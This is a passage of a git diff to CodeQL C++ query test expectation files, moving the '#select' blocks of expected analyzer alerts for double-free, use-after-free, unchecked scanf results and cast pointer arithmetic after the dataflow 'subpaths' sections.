output argument | test_free.cpp:14:10:14:10 | a | provenance | | | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | provenance | | @@ -58,3 +43,18 @@ nodes | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:322:12:322:12 | a | semmle.label | a | subpaths +#select +| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | +| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | +| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | +| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | +| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | +| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected index 153350b2a99c..891141f56f1e 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected @@ -1,28 +1,3 @@ -#select -| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | -| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | -| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | -| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | -| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | -| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | -| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | -| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:245:5:245:8 | call to free | call to free | -| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | -| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | -| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | -| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | -| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:331:5:331:12 | delete | delete | edges | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | provenance | | | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | provenance | | @@ -118,3 +93,28 @@ nodes | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:332:5:332:6 | * ... | semmle.label | * ... | subpaths +#select +| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | +| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | +| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | +| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | +| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | +| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | +| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | +| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:245:5:245:8 | call to free | call to free | +| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | +| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | +| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | +| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | +| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:331:5:331:12 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected index e9c1038e5a4f..9b7564b9123d 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected @@ -1,25 +1,3 @@ -#select -| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | -| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | -| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | -| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | -| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | -| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | -| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | -| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | -| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | -| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | -| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | -| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | -| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | -| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | -| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | -| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | -| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | -| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | -| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | -| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | -| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | edges | test.c:10:31:10:32 | sscanf output argument | test.c:11:7:11:7 | x | provenance | | | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | provenance | | @@ -186,3 +164,25 @@ nodes | test.cpp:575:30:575:31 | scanf output argument | semmle.label | scanf output argument | | test.cpp:577:9:577:9 | i | semmle.label | i | subpaths +#select +| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | +| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | +| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | +| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | +| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | +| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | +| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | +| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | +| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | +| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | +| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | +| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | +| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | +| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | +| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | +| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | +| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | +| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | +| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | +| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | +| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected index 0b8acb7030d6..75e2e581664e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected @@ -1,13 +1,3 @@ -#select -| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | -| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | edges | test.cpp:26:29:26:29 | b | test.cpp:27:2:27:2 | b | provenance | | | test.cpp:30:34:30:34 | b | test.cpp:31:2:31:2 | b | provenance | | @@ -38,3 +28,13 @@ nodes | test.cpp:87:25:87:26 | d2 | semmle.label | d2 | | test.cpp:88:21:88:22 | d2 | semmle.label | d2 | subpaths +#select +| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | +| test.cpp:31:2:31:2 | b | 